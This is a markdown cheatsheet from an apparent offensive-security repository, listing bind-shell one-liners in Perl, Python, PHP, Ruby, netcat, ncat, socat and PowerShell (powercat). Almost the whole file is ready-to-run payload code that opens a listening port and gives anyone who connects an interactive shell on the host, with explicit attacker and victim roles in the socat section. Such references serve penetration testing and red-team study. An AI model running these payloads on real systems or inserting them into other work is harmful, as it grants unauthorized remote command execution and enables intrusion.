daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

shell-bind-cheatsheet.md (2730B)


      1 ---
      2 title: "Bind Shell"
      3 section: "Cheatsheets"
      4 sectionSlug: "cheatsheets"
      5 sourcePath: "docs/cheatsheets/shell-bind-cheatsheet.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cheatsheets/shell-bind-cheatsheet.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Bind Shell
     12 
     13 ## Summary
     14 
     15 * [Bind Shell](#bind-shell)
     16     * [Perl](#perl)
     17     * [Python](#python)
     18     * [PHP](#php)
     19     * [Ruby](#ruby)
     20     * [Netcat Traditional](#netcat-traditional)
     21     * [Netcat OpenBsd](#netcat-openbsd)
     22     * [Ncat](#ncat)
     23     * [Socat](#socat)
     24     * [Powershell](#powershell)
     25 
     26 ## Perl
     27 
     28 ```perl
     29 perl -e 'use Socket;$p=51337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));\
     30 bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);\
     31 close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/bash -i");};'
     32 ```
     33 
     34 ## Python
     35 
     36 Single line :
     37 
     38 ```python
     39 python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",51337));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'
     40 ```
     41 
     42 Expanded version :
     43 
     44 ```python
     45 import socket as s,subprocess as sp;
     46 
     47 s1 = s.socket(s.AF_INET, s.SOCK_STREAM);
     48 s1.setsockopt(s.SOL_SOCKET, s.SO_REUSEADDR, 1);
     49 s1.bind(("0.0.0.0", 51337));
     50 s1.listen(1);
     51 c, a = s1.accept();
     52 
     53 while True: 
     54     d = c.recv(1024).decode();
     55     p = sp.Popen(d, shell=True, stdout=sp.PIPE, stderr=sp.PIPE, stdin=sp.PIPE);
     56     c.sendall(p.stdout.read()+p.stderr.read())
     57 ```
     58 
     59 ## PHP
     60 
     61 ```php
     62 php -r '$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);socket_bind($s,"0.0.0.0",51337);\
     63 socket_listen($s,1);$cl=socket_accept($s);while(1){if(!socket_write($cl,"$ ",2))exit;\
     64 $in=socket_read($cl,100);$cmd=popen("$in","r");while(!feof($cmd)){$m=fgetc($cmd);\
     65     socket_write($cl,$m,strlen($m));}}'
     66 ```
     67 
     68 ## Ruby
     69 
     70 ```ruby
     71 ruby -rsocket -e 'f=TCPServer.new(51337);s=f.accept;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",s,s,s)'
     72 ```
     73 
     74 ## Netcat Traditional
     75 
     76 ```powershell
     77 nc -nlvp 51337 -e /bin/bash
     78 ```
     79 
     80 ## Netcat OpenBsd
     81 
     82 ```powershell
     83 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 51337 >/tmp/f
     84 ```
     85 
     86 ## Ncat
     87 
     88 ```powershell
     89 ncat -nlvp 51337 -e /bin/bash
     90 ```
     91 
     92 ## Socat
     93 
     94 ```powershell
     95 user@attacker$ socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 
     96 user@victim$ socat TCP-LISTEN:12345,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane
     97 ```
     98 
     99 ## Powershell
    100 
    101 ```powershell
    102 https://github.com/besimorhino/powercat
    103 
    104 # Victim (listen)
    105 . .\powercat.ps1
    106 powercat -l -p 7002 -ep
    107 
    108 # Connect from attacker
    109 . .\powercat.ps1
    110 powercat -c 127.0.0.1 -p 7002
    111 ```